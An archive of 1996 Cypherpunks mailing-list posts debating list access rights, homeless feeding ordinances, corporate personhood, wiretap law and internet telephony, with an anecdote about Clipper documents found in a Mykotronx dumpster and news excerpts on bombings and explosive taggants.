ichudov@algebra.com (Igor Chudov @ home) writes:
> employees will at least know to keep their own business out of computers
> that will be monitored by the company anyways.

Igor learned it the hard way... He's no longer reachable @wiltel.com. :-)

> This is ultimately to the betterment of employees themselves if they
> fall prey to complaints of the likes of January KOTM The Right Reverend
> Colin James III (puke). For the information of those who do not know
> CJ3 made it a hobby to complain to the employers of people whom he did
> not like -- with not much success though.

Not true - Colin got several forgers in serious trouble for their net-abuse.
More power to him.  The Internet needs more people like TRRCJ3 (pbuh).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 15:31:54 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Tolerance (fwd)
In-Reply-To: <199608030358.WAA11568@einstein>
Message-ID: <Pine.SUN.3.91.960802221348.29048B-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 2 Aug 1996, Jim Choate wrote:

> Stating a list is 'public' is an inherent contract between the list
> provider and the subscriber with certain expectations on both parties part.
> The list provider expects no illegal activity to take place such that they
> are placed in jeopardy and the subscriber expects to recieve access to a
> public (ie not regulated by a third party other than themselves and the
> members en toto) list. Claiming the right to throw somebody off for any
> reason other than illegal activity nullifies the claim of 'public'.

A.  Where does Jim get the terms of the contract he implies from
    the simple word "public"?  As far as I can see, he simply made
    it up from whole cloth.  Interesting, but totally without any
    legal basis.
B.  I'm unaware that the Cypherpunks list has ever been advertised
    as "public" by the list owner.
C.  Combining A & B, I know of know instance where the owners of
    the Cypherpunks list ever made any indication that they were
    adhearing to the Byzantine interpretation of contract law as
    suggested by Jim.  (It sure doesn't comport to what I learned
    in my Contracts classes.)

> > A restaurant or bookstore is a public place in that it is open
> > to the public.
> 
> I know of no state in the union where a bookstore, restaurant,
> mall, etc. is considered public.

Actually, it's the law in ALL states in the union since the Public 
Accomidations Act was enacted some time in the '60s (with the
possible exception of Texas, I guess).

> Legaly a public place is someplace which is operated using
> public monies.

Like the Cypherpunks list?  Citation, please.

The problem with Jim is not that he doesn't know anything, but
rather that he knows so many things that aren't true.  (But I
would not favor enforcing the state granted monopoly on the
practice of law if Jim wants to hang out his shingle.  If he can
get someone to pay him for legal advice, more power to him, but 
/caveat emptor/.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 14:51:21 +0800
To: cypherpunks@toad.com
Subject: Re: "adjust your attitude with their billy club" (fwd)
Message-ID: <199608030343.WAA11512@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 12:01:41 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: "adjust your attitude with their billy club" (fwd)
> 
> > to yourself. The burden of proof rests on the individual to prove that such
> > actions by a third party are a public nuisance.
> 
>    Bzzt, wrong anser. Thanks for playing.  A state and it's political 
> subdivisions does have the power to enact an ordinance DEFINING what 
> constitutes a public nuisance. They need merely protect 
> constitutionally-protected rights.

States don't enact ordinances, they enact laws. An ordinance is a regulation
which applies in a local municipality regulated by a charter. Laws are
enacted by a state or federal government regulated by a constitution. A
trivial distinction I agree. I would be willing to accept the premise that
in practice such terms are equivalent.

They have the right to enact such ordinances if their charter permits. No
community, state, or federal government in the US is given carte blanche in
regards to the creation of laws, regulation, and ordinances.

If you live in a state which permits the state government to enact such laws
then you have my sympathy. At least here in Texas the state government is
not given that job. It is left to the individual municipalities to define
public nuisance. Here in Austin the homeless were allowed to sleep at the
capitol because it is public property. Sad to say, that day is dead.
I oppose those changes as well. I believe it would be a good thing if more of
our public representatives had to face the homeless and other unpleasantries
in modern life on a personal and daily basis. They might be motivated to get
off their asses and serve the people instead of their campaign contributors.

Which constitution? The Federal government is tasked with upholding the
Constitution, not the states. The states are tasked with upholding their
individual Constitution provided they don't conflict with federal laws.
Municipalities are tasked with upholding their charters unless at odds with
the state or federal constitutions. You make it sound like my local city
council person is responsible for the Constitution, they are not any more
than I am.


> The City of Seattle may not define the act of disseminating anonymous 
> pamphlets as a nuisance. They may define the act of dissemination by 
> throwing them out the window of a moving vehicle, as a nuisance.

I would call it littering. There is litte reason to expect people to pick up
pamphlets from the middle of the street. As to handing them out, that is
protected. If the person you hand it to throws it down on the ground then
they are littering. It is called personal responsibility and respect for
oneself. From this springs respect for others.

> YOu are disconnected from reality. I am not going to waste further 
> keystrokes on this topic. My side already controls the electoral college 
> on this one. It's not my problem.

I may be disconnected from your reality, but reality is observer dependant.

But it is your problem because 'your' side is aging and my generation is just
now coming into power (ie eligable to run for president and such). With a
little luck we might be able to make a difference. All those people out there
you look down upon living in the streets with mohawks and rings through
their clits listening to Pigface and Skinny Puppy get to make the decisions
now. My suggestion to those who support the status quo is to run, run very
fast. We are the ones your mother warned you about. Were pissed off enough
that we aren't going to use violence and such, we intend to use your own
system of rules against you.

                                               Ravage
                                                Black
                                                 Leather
                                                  Monster





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 3 Aug 1996 15:55:39 +0800
To: cypherpunks@toad.com
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now ...
Message-ID: <199608030552.WAA18439@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 PM 8/2/96 -0700, Lucky Green wrote:
>At 18:29 8/1/96, Timothy C. May wrote:
>
>>(With the Internet Phone deals--even Intel is entering the market--why are
>>there no widespread uses of PGP or S/MIME? Yes, I know about about PGPhone,
>>and also the Nautilus product, but none seem to be used by anyone I know.
>>Maybe we should spend some time talking about the practical realities of
>>these tools.)
>
>The sound quality really isn't there, unless you have a fast machine or a
>fat pipe. In addition, the vast majority of Intel based computers lack the
>crucial (for user acceptance) full-duplex soundcard. Add to that the
>physical impossibility of getting decent real time services over a
>non-isochronous network, such as the Internet, I'net phones just don't
>provide suffcient speech quality for business/serious personal use even
>without the added overhead of crypto.

Which reminds me...  If there is any function Cypherpunks (and/or 
cyberpunks) should perform, it's one of using a "bully pulpit" to influence 
technical developments.  Consider, for example,  your observation that "the 
vast majority of Intel based computers lack the crucual full-duplex 
soundcard."  When I first heard that this was true, I wondered what bunch 
of nincompoops were responsible for this outrage.

There are  many potential uses for soundcards which require full-duplex 
operation.  Only the most stupid and basic functions don't.  There was no 
good reason for this lack; Presumably if somebody had been at the 
right place at the right time, he could have reminded that shit-for-brains 
"engineer" of the obvious consequences of building a product with such an 
egregious bug designed into it.

Anyway, that's water under the bridge.  However, we're probably all in 
agreement that Internet telephone (non-encrypted as well as encrypted) is 
going to be a big product in just a few years. This will require (or desire) 
a few high-CPU-power functions:

1.  A modem, obviously.
2.  Good encryption, possibly.
3.  Audio A/D and D/A, and associated compression functions.

 I propose that the better way of implementing it, rather than going through 
a sound card, is for modem manufacturers to built an  new modem with an 
extra telephone connection (perhaps the same physical connector that's 
currently used for the telephone handset) which goes to an ordinary 
telephone and does the audio A/D and D/A conversion, as well as the data 
compression/data expansion function that will be necessary.  The latter 
function would be done by an extra DSP on this modem/Internet telephone card. 

 Briefly, you'd talk into an ordinary telephone on your desk, which would be 
connected to the modem/telephone card.  That card would digitize your speech 
to whatever level of resolution  is practical, and compress it into an 
appropriate data rate.  This data would either be encrypted by the same DSP, 
or possibly presented to the host CPU for encryption.  From there, it would 
be sent to the modem section and transmitted over the telephone line. 

I think this would be superior to the use of a sound card, for a number of 
reasons.  First, obviously, is the reduction in cards in simple and/or 
portable systems.  To require that you have both a modem and a sound card 
(as well as a cpu) to implement an Internet telephone is unreasonable.  
Secondly, using a sound card (which can't do any compression) requires that 
you implement both the compresssion and encryption function with the host 
processor, which might be impractical for a low-cost processor like a '486.  
Putting a substantial portion of this function into a dedicated DSP means 
that main-processor overhead becomes minimal.  

Third, implementing a "flow-through" telephone circuit allows you to 
interpose this encryptor into an existing telephone system, such as that of 
a house or office.  The existing handsets can be used with no modification, 
presumably.  This would also allow easy implementation of a 
computer-controlled answering machine-type, because the computer will be 
able to digitize/synthesize audio as well as record it.  It could also 
implement fax and modem/bbs functions.





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 13:53:12 +0800
To: cypherpunks@toad.com
Subject: Re: Tolerance (fwd)
Message-ID: <199608030358.WAA11568@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 07:59:05 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: Tolerance (fwd)

> Here I have to respectfully disagree, totally, with Jim.  One
> does not have to "reserve" one's rights.  They are inherent and
> my be exercised pretty much at will (I say "pretty much" because
> there are situations where "implied contract" applies).

Exactly! Stating a list is 'public' is an inherent contract between the list
provider and the subscriber with certain expectations on both parties part.
The list provider expects no illegal activity to take place such that they
are placed in jeopardy and the subscriber expects to recieve access to a
public (ie not regulated by a third party other than themselves and the
members en toto) list. Claiming the right to throw somebody off for any
reason other than illegal activity nullifies the claim of 'public'.

> A restaurant or bookstore is a public place in that it is open
> to the public.

I know of no state in the union where a bookstore, restaurant, mall, etc. is
considered public. In Texas such places make it clear that they are private
places and that they reserve the right to refuse service and/or ask you to
leave the premises.

Legaly a public place is someplace which is operated using public monies.

> Nevertheless, without first "reserving the right"
> to do so, the owners may tell you to leave if they don't like 
> the way you sound, look or smell. 

Because they ain't any more public than my house is on Wednesday nites when
I have it open to folks. I assure you that if somebody were to show up
smelling or filthy they would be asked to leave and if they refused I would
call a police officer and press trespass charges.

> Criminal activity is not
> required legally nor ethically.  Your ejection may, in fact, be
> totally arbitrary.  I don't see a privately maintained, "public"
> list as being philosophically any different.

The only way a police officer can expell you from a public place other than
for criminal behaviour is if the municipality passes ordinances regarding
access (ie open from 7-10 for example in the case of city parks here in
Austin) which must apply to ALL citizens equaly not just the vagabonds (I
have been thrown out of parks on many occassions and I assure I don't look
like a street bum even when I was living on the street in the early 80's - 
for grins I might add).


                                                 Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sat, 3 Aug 1996 13:20:01 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: VISA Travel Money
In-Reply-To: <Pine.SUN.3.91.960802191032.26652B-100000@crl5.crl.com>
Message-ID: <9608030331.AA07184@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I don't think that VISA travel money will be a major product
for VISA. When I spoke with Azbo about it it was not a 
major strategic direction for them.  He described its use by 
First Bank of Internet (later first Branch of Internet).  I think that
VISA would LIKE to provide the Ability for travel money, to function 
as a debit card, but it would then be very close to their existing 
product of secured payment cards.There are good reasons why aproduct 
that allows you to draw a specific amount of cash out of ATM's is a good 
idea for VISA and useful for a small number of customers, but I think 
you're reading way to much into this.  Much more interesting are proposals
by the Federal reserve Board, to exempt from regulation E certain types of 
stored value card provided they store no more than $100.  While $500 would
seem to me to be a more serious and sensible level while still not having
particular money laundering advantage (5 $100 bills is smaller than 
one smart card) it is at least a start.

Phill

PS Be willing to bet donuts provided he can suggest a way of delivering them 
via internet.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 16:32:05 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608030617.BAA11822@einstein>
Message-ID: <Pine.SUN.3.91.960802231226.25121A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 3 Aug 1996, Jim Choate's dog wrote:

> Really? Then would you mind explaining why costs rise over time
> instead of going down?

Gladly. Prices rise over time because of inflation of the money 
supply.  While it is possible for private actors to temporarily
inflate the money supply (e.g., extension of credit by banks),
only the government can increase the money supply indefinitely.  
Inflation is the most insidious form of "taxation."  It steals
silently and punishes the savings in favor of consumption.

> Insurance has become involved in the medical industry, what
> happened? The cost has gone through the roof. The airplane
> industry was deregulated in the late 70's, what happened? The
> price of a ticket went up...yada yada yada.

Technically, Jim's logical fallacy is called /post hoc, ergo 
propter hoc/, after this, therefore on account of this.

> If this is so then by your own argument, business are operated
> by people therefor they are people...

Nope, that's not what I said.  This fallacy is called a "straw
man."  It is a weak or mistated opposing argument set up by a 
politician or debator, etc., in order that he may attack it and
gain an easy, showy victory.

Since you have mistated my position, the balance of your argument
is irrelevant.  (But thanks for playing.)

> Is your contention that because I own and
> operate a computer it should be given rights?

Nope.  Whatever gave you that idea?

> > > Businesses are a system of rules and procedures...
> > 
> > Made and enforced by PEOPLE.  Jim is begging the question.
> 
> Which question would that be? "Should businesses be considered
> people with the same rights and priviliges?"

Nope.  You just don't get it, do you?

> Sounds like the original proposition, that businesses should be
> awarded the same rights as people because they are owned and
> operated by people, is a reduction to absurtity.

More straw men.  From what orfice was that proposition pulled?

> If I may, I would like to use a quote from the Transformers
> movie,

Could these be the source of Jim's legal and economic knowledge?
You be the judge.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 16:32:54 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] roving wiretaps
Message-ID: <199608030650.XAA21091@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:52 AM 8/2/96 -0700, daw@cs.berkeley.edu (David Wagner) wrote:
>> would dramatically change surveillance authority to include wiretaps of
>> INDIVIDUALS instead of LOCATIONS.
>I don't get it.  Help me out here-- how can this possibly be constitutional?
     [CENSORED MATERIAL DELETED]

You've been hanging out with those subversive Canadians again,
haven't you?  It's covered by the Terrorism Exception to the 4th Amendment.*

>P.S.  Do police really need a search warrant to wiretap cellular phones?

Do you mean legally?  :-)
Some combination of laws and court decisions has established that
cordless phones don't provide an expectation of privacy,
but cellular phones do, so eavesdropping on cellular phones
requires wiretapping authorization (whether a warrant, FISA permission,
or whatever other procedures constitute Due Process.)




-----------------------------------
* The Drug Exception to the 4th Amendment says ", except for drugs, of course."
  The Terrorism Exception says "Be afraid.  Be very afraid."
-----------------------------------
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sat, 3 Aug 1996 15:04:59 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] roving wiretaps
In-Reply-To: <2.2.32.19960802234117.006acb90@gonzo.wolfenet.com>
Message-ID: <rogervif183vx.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> writes:

  >> One should understand that monitoring cellular traffic is *much*
  >> more difficult than tapping a conventional phone...

  > I'd have to disagree on that point.  Monitoring cellular traffic
  > requires nothing more than a cellular phone, and some software
  > which enables you to follow calls through the cells, for a total
  > cost of about $500...

Agreed.  I know that this capability was available to organisations at
the level of the State Police over ten years ago, and has long been
available to anyone with a credit card and the ability to read the
adverts in the back of _Police Chief_ magazine...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 16:36:22 +0800
To: cypherpunks@toad.com
Subject: Liberating Clipper Stuff from Mykotronx Dumpsters
Message-ID: <ae28445005021004823e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:24 AM 8/3/96, Bill Stewart wrote:
>At 09:20 AM 8/1/96 -0800, jim bell <jimbell@pacifier.com> reminded us:
>>Also:  Clipper was fabbed by VLSI Technology.  A few pointed inquiries might
>>work wonders here.
>
>It was made by Mykotronx, using tamperproof programmable gate
>array chips from VLSI, though I don't remember whether they were
>entirely programmed at Mykotronx+NSA, or whether they were
>mostly mask-programmed at VLSI first.

By the way, newcomers to the list (I'm not referring to Bill, of course)
may not know some of the background on this Mykotronx story. An interesting
use of remailers, too.

One of the early list subscribers went "Dumpster-diving" outside the
Torrance, CA headquarters of Mykotronx, a previously little-known defense
subcontractor.

Amongst the stuff in the Dumpster, unshredded, he found:

- payroll information

- copies of contracts with VLSI Technology, the NSA, AT&T, etc., showing
the work to have started back in the early 90s

- yield information on the chips, and some limited test information

- copies of various memoranda between AT&T, the NSA, the FBI, Mykotronx,
Sandia, and VLSI Technology

- a bunch of other goodies

He scanned or typed this stuff he found into a text file and sent it to one
of the earliest members of the Cypherpunks list, asking for it to be passed
on to someone who could do something with it. A few hours later, via
anonymous remailer posting, it went out to the several hundred subscribers
to the Cypherpunks list at that time. (It's somewhere in the archives, such
as they are. This would be around late April, 1993, possibly May-June.)

I later heard that Mykotronx was mightily embarrassed to have this kind of
stuff found in Dumpsters out where anyone could find it, and that "the
authorities" ordered a tightening up of security.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 16:44:23 +0800
To: cypherpunks@toad.com
Subject: Re: Jim Bell, stay out of Georgia....
Message-ID: <199608030708.AAA21521@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 AM 8/2/96 -0400, Duncan Frissell <frissell@panix.com> wrote:
>>>   JONESBORO, Ga. -- An 18-year-old self-styled anarchist who allegedly
>>>   distributed a free, homemade pamphlet with anti-government rhetoric
>>>   has been charged with advocating the overthrow of the U.S. government.
.....
>Brian -- why do the cops do busts like this where they know they will be
>thrown out?

1) Because they can
2) Because they can get away with it
3) Because most of the public approves of this kind of <noun deleted>
4) Because they can put out press releases encouraging 2) and 3)
   and folks will believe them.
5) Because if the case gets dropped it _might_ make Page 43 of the 
   newspaper and will be covered in a way that makes it clear
   that they're the good guys.
6) Because the state/city/town will cover their legal costs
   and penalties if they somehow lose a lawsuit
7) Because the state/city/town _won't_ cover the costs of a real
   defense of the "self-styled anarchist", who'll have to put up
   with a lot of crap as well as the 47:59:59 hours they can
   keep him in jail for no good reason plus any more until he
   can make bail for the bogusly heavy charges they'll lay on him.
8) Because once you're a "self-styled" anything, you don't get no respect.
9) I've never met any cops who were bullies - have you?
10)It's covered by the Anarchists and Commies Exception to the First Amendment.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 14:57:12 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS (fwd)
Message-ID: <199608030514.AAA11685@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 21:33:20 -0700
> From: shamrock@netcom.com (Lucky Green)
> Subject: Re: SOUP KITCHENS (fwd)
> 
> >In my experience they don't get hassled because they get the requisite
> >permits and act in good faith. Many of these small businesses and street
> >vendors are 'hassled' because they are unwilling or unable to meet basic
> >commen sense standards of conduct and go out of there way to circumvent
> >regulations and in some cases commen sense.
> 
> I was there when Food Not Bombs got busted in San Francisco. They tried to
> get a permit from the Health Department, but the HD refused to even process
> the application. FNB finally won the case. I guess next time the HD will be
> smarter, process the application and deny it. At present, SF has a
> hands-off policy in regards to Food Not Bombs.

What exactly was the reason for the refusal to process the form? At that
point the FNB folks should have started a suite against the city and not
gone to the park. If they did they should have been very careful about
advertising the HD's refusal and making it clear that their presence and
actions there were a form of political disobedience.

There are good ways to tweak a nose and there are bad ways. Sounds like
these folks chose a bad way to begin with. I am glad to hear that justice
won out in the end. I bet next time the HD just processes the form. Is the
person in charge of the HD elected or appointed? If appointed than start a
suite against them as well as the department.

> The feeding was never the real issue. The heavy political indoctrination
> that came with it was. Patrick McHenry handed out the food, screaming in a
> mike, in front of the Federal Building (without interfering with
> pedestrians in any way) as the Feds came out on their lunch hour, having to
> listen to him complain about President Bush's CIA background, calling Bush
> a drug dealer, and demanding to know why there was no money for food when
> there was plenty of money for nukes.

I would have gone back the next day w/ a larger amp.

> Now can we please let this thread (at least on the list) die?

Certainly.

                                                Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 3 Aug 1996 16:59:49 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <2.2.32.19960803071838.006b0808@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:42 PM 8/2/96 -0500, you wrote:
>
>Forwarded message:
>
>> Date: Fri, 2 Aug 1996 16:50:01 -0500 (CDT)
>> From: snow <snow@smoke.suba.com>
>> Subject: Re: A Libertine Question
>> 
>>      As long as you are enforcing it on everyone, I don't think you'd have a 
>> problem, but to force some one from cooking food for homeless people, and 
>> allow a family barbeque, is IMO wrong.
>
>Not at all. Businesses have no rights, individuals do. Businesses have a
<snip>
>Blueberries they bought at the local HEB). Individuals have a right to
>privacy, that includes cooking themselves food without harrassment. Business
>on the other hand are selling products of potentialy questionable quality. A

I disagree with your sentiments about Business and rights, however, in this
instance, even that wasn't the issue. Food Not Bombs is NOT a business, it's
a not-for-profit organization that gives out (not sells) food.  They are the
same as, I think Tim May pointed out, a Boy Scout picnic, except for the 
homless, not the boy scouts.

//cerridwyn//






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 3 Aug 1996 11:01:06 +0800
To: cypherpunks@toad.com
Subject: BOO_mer
Message-ID: <199608030028.AAA04054@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-2-96. WaJo: 
 
   "More Bombs Are Exploding Across the U.S." 
 
      What also worries law-enforcement officials are the 
      comparatively unspectacular bombs exploding at a rising 
      rate in neighborhoods across the country. Indeed, with 
      homicides declining, bombings may have become the 
      fastest-growing category of violent crime. "In the old 
      days, kids would break windows," says John O'Brien, an 
      agent in Washington with the federal Bureau of Alcohol, 
      Tobacco and Firearms. "Now, they're making pipe bombs." 
      Police say one of the most popular bombs among 
      youths -- one combining acid and other ingredients in a 
      bottle -- is called the "McGyver" because many learned 
      about it from the television show. David Estenson, head 
      of a bomb-crisis management firm and former head of the 
      Minneapolis police bomb squad, observes that many of the 
      pipe bombs in Israel contain only match heads. 
 
   "U.S. Studies Use of Chemical Tracers To Track Explosives 
   in Terrorist Blasts." 
 
      The Treasury Department is studying a family of trace 
      chemicals -- first developed by U.S. weapons scientists 
      to track the fallout of nuclear weapons -- as a way to 
      give terrorist explosives an identifiable trail. The 
      trace chemicals are newer and much smaller than plastic 
      "taggants," which have provoked resistance from the 
      explosives industry and gun lobbies. Desmonde Cowdery, 
      vice president of Isotag L.L.C., a small Houston company 
      that has obtained commercial rights to the process, 
      claims the chemical tracers are so small they can be 
      blended with all types of explosives, including 
      fertilizers and gunpowders, without interfering with 
      chemical reactions. 
 
   "Can America Stomach a War on Terror?" 
 
      The lessons from the world's battlefields of terror are 
      sobering. Not only have few countries been able to make 
      much of a dent in a determined terrorist campaign, but 
      their efforts also often incur a heavy price. 
      Due-process rights have been suspended, freedoms of 
      speech curtailed, police powers beefed up. 
 
      Tommy Sands, a Belfast folk singer, praises America's 
      caution. He says that in Northern Ireland and other hot 
      spots, authorities have often overreacted to the initial 
      threat. "It's like driving a car and seeing a red light 
      come on that means you're short on oil. If you take a 
      hammer to it, the red light will go out, but you're 
      still short on oil," Mr. Sands says. "Sometimes there 
      are answers other than the big hammer." 
 
   ----- 
 
   http://jya.com/boomer.txt  (19 kb for 3) 
 
   Lynx: http://pwp.usa.pipeline.com/~jya/boomer.txt 
 
   BOO_mer 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 14:17:10 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: A Libertine Question
In-Reply-To: <Pine.LNX.3.93.960802164703.1649B-100000@smoke.suba.com>
Message-ID: <Pine.SV4.3.91.960803002218.1359A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> > illegal to operate a residential kitchen and a residential sewge-disposal 
> > operation in a city park or a city sidewalk?
>      As long as you are enforcing it on everyone, I don't think you'd have a 
> problem

    Let's clarify something here. I am not complaining about these
fruitcakes who want to help the homeless retain their drug & alcohol
stupors, by taking care of them the way one takes care of a child - buying
the food, cooking the food, putting the food on their plate, etc. 

I anm referring to the homeless people who stake out "their" peice of a 
publicly owned real estate, and set up a continuing residence - cardboard 
or better box, ersatz cooking facilities, etc, etc. And then start acting 
out their own particular psychoses. Which typically involves accosting 
passersby, or worse.

Ya know, if these homeless folks were even doing this stuff with decorum,
 and not making disturbances and assaulting people, I for one wouldn't
give a shit.  Some may recall, as I do, the report in the New York Times a
few years ago about a chap who set up household 30 feet up in a tree in
Central Park. He was living there for 2 years before the Park Rangers
noticed and then evicted him. The fellow had several rooms, and even
running water. Don't ask me how. 

I admire that dude.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 15:09:23 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608030542.AAA11740@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 3 Aug 1996 01:03:43 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: A Libertine Question (fwd)
> 
> Corporations are state-created persons [legal definition of "person", not
> colloquial vernacular]. They have some privileges which have surface 
> resmblence to the rights of natural people. For example, they can "have 
> standing" in a court to initiate a legal proceeding - in their own name, 
> not that of an agent or employee or trustee.

Exactly, 'surface resemblance'. The Constitution at no point mentions
businesses in respect to the rights of the individual which is where all
discussions must start from in this government.

For example, some folks have claimed that corporations have rights that
prevent warantless searches and such. I have to strongly disagree. I see no
rational way to extend this to a corporation. If the police must use a
warrant to search a business located other than in a persons home or on
their property it is because the people who are present on that premisis
have rights and those rights would be infringed by such searches. I am not
even shure I accept the legal premise of corporations.

The amendment say:
 
	The right of the people to be secure in their persons, houses, 
papers, and effects, against unreasonable searches and seizures, shall 
not be violated, and no Warrants shall issue, but upon probable cause, 
supported by Oath or affirmation, and particularly describing the place 
to be searched, and the persons or things to be seized. 
 

                                                Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 15:07:55 +0800
To: cypherpunks@toad.com
Subject: Re: "adjust your attitude with their billy club" (fwd)
Message-ID: <199608030545.AAA11749@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 3 Aug 1996 01:13:14 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: "adjust your attitude with their billy club" (fwd)
> 
> > But it is your problem because 'your' side is aging and my generation is just
> > now coming into power (ie eligable to run for president and such). With a
> 
> Why am I having these flashbacks to the Clinton Campaign promises of 1992 
> about there existing a young man who is a "New Democrat", a white house 
> that will have the highest-ever level of ethics, etc, etc, etc.

My first guess is that you were taking LSD back then but then I wasn't
there. The second guess would be because you didn't read very carefuly. I
said nothing about highest-ethics or any other such promises of behaviour or
action. I think you are reading more into my statement than is there. I
simply said that some of my generation plan on using the rules against the
establishment.

I consider that a subtle but important difference.

                                             Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 15:12:17 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS (fwd)
Message-ID: <199608030546.AAA11760@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From cypherpunks-errors@toad.com Sat Aug  3 00:38:30 1996
